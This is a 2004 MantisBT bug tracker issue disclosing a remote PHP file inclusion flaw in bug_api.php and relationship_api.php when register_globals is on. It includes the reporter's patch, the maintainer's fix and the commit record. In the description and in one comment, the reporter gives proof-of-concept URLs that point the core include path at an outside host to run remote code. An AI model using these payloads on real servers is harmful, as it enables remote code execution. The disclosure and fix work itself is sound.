0004239: Remote PHP Code execution - MantisBT

ID	Project	Category	View Status	Date Submitted	Last Update
0004239	mantisbt	security	public	2004-08-01 12:14	2006-10-09 11:54

Reporter	joxeanpiti	Assigned To	grangeway
Priority	normal	Severity	major	Reproducibility	sometimes
Status	closed	Resolution	fixed
Product Version	0.19.0a2
Fixed in Version	0.19.0rc1

Summary	0004239: Remote PHP Code execution
Description	If the Register_Global directive is set to on, an attacker may execute arbitrary PHP code.
Additional Information	If the REGISTER_GLOBAL variable is set we can execute arbitrary php code by overwriting the global variable $t_core_dir with our desired url (for example http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/) The following files are vulnerables : bug_api.php -> Line 22 (using $t_core_path) relationship_api.php -> Line 14 (using $t_core_dir)
Tags	No tags attached.
Attached Files	new.patch (224 bytes) diff ./bug_api.php ../core/bug_api.php 22d21 < $t_core_path=$t_core_dir; diff ./relationship_api.php ../core/relationship_api.php 13c13 < $t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR; --- > 609c609 < ?> --- > ?> new.patch (224 bytes)

grangeway 2004-08-01 12:26 reporter ~0006530	Both of these issues have now been fixed in CVS. Thanks for the report. If you find anything else, please let us know.

joxeanpiti 2004-08-01 13:16 reporter ~0006534 Last edited: 2004-08-01 13:25	Not corrected in version Mantis 0.19.0-CVS, sorry! I download it at : Sun Aug 1 20:17:27 2004. To try it : 1.- http://localhost/mantis/core/bug_api.php?t_core_path=http://fucking.site.com/ Problem in file core/bug_api.php at line 22. 2.- http://localhost/mantis/core/relationship_api.php?t_core_dir=http://fucking.site.com/ Sorry for the insistence. editada el: 08-01-04 13:25

joxeanpiti 2004-08-01 13:24 reporter ~0006535	I upload a simple patch. This works for me.

grangeway 2004-08-01 13:29 reporter ~0006536	Sourceforge viewcvs etc tend to lag behind real cvs commits. The commits i did listed below, which seems to match your diff file. Just a matter of waiting for sf.net to catch up with life :) bug_api.php @@ -19,7 +19,7 @@ require_once( $t_core_dir . 'sponsorship_api.php' ); `# MASC RELATIONSHIP` require_once( $t_core_path.'relationship_api.php' ); require_once( $t_core_dir.'relationship_api.php' ); MASC RELATIONSHIP and to relationship API: Relationship API $t_core_dir = dirname( FILE ).DIRECTORY_SEPARATOR; require_once( $t_core_dir . 'collapse_api.php' ); MASC RELATIONSHIP

joxeanpiti 2004-08-01 13:31 reporter ~0006537 Last edited: 2004-08-01 13:31	Sorry :) editada el: 08-01-04 13:31

grangeway 2004-08-01 13:40 reporter ~0006538	no problem :)

MantisBT: master 42aefcbf 2004-08-01 13:28 Paul Richards Details Diff	Fix 0004239: Remote PHP Code execution git-svn-id: http://mantisbt.svn.sourceforge.net/svnroot/mantisbt/trunk@2790 <a class="text" href="/?p=mantisbt.git;a=object;h=f5dc347c">f5dc347c</a>-c33d-0410-90a0-b07cc1902cb9		Affected Issues 0004239
	mod - core/bug_api.php		Diff File
	mod - core/relationship_api.php		Diff File